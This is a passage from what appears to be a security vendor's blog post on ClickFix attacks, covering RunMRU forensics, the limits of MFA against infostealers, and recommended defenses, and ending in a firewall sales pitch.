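Write-Host "Artifacts written to $OutDir"
```

RunMRU is the artifact people forget: the Run dialog keeps a list of what was typed into it, under letter-named values with MRUList giving the order, so the exact command survives even if the clipboard has since been overwritten. The script collects and hashes only; killing the second stage or removing persistence comes after the capture, and from the IR team’s playbook rather than from a script.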
Q: Does MFA protect against ClickFix attacks?
A: Partially. MFA protects your accounts from credential theft: if the ClickFix payload installs an infostealer that harvests saved passwords, those passwords alone can’t be used to log in. But infostealers also take browser session cookies, and a stolen cookie lets an attacker resume an already-authenticated session without ever being asked for a second factor, so session lifetime and the ability to revoke tokens matter as much as the factor itself. MFA also does nothing to stop the initial command from executing, and nothing against a remote access trojan that gives the attacker a live connection through the compromised machine, inside whatever sessions the employee already has open. MFA is essential but not sufficient as a ClickFix defense.
Conclusion
ClickFix attacks are up 500% because they work. They bypass antivirus, they evade email filters, they slip past web filtering, and they do it all by turning your own employees into the attack tool. That’s a brutal combination — and it’s exactly why this technique spread so fast across the threat landscape.
The defense is clear even if it’s not simple. DNS filtering cuts the connection before the payload delivers. Behavior-based EDR catches what slips through. And employee training — real training, with simulations and specific scenarios — is the only thing that stops the attack before it even starts. A team that knows what ClickFix attacks look like won’t execute the command. That’s the whole game.
Start with your network perimeter. If your firewall isn’t running live threat intelligence and DNS filtering, you’re relying on your employees to catch every attack — and that’s too much to ask. Browse our firewall collection to find the right next-generation solution for your network and close the door ClickFix attacks are walking through.
Related Reading
- Why Small Businesses Close After a Cyberattack
- The Hidden Danger of Public WiFi in 2026
- Router Settings You Must Change Right Now
- VLAN for Home Network 2026: Complete Setup Guide
- How Hackers Break Into Security Cameras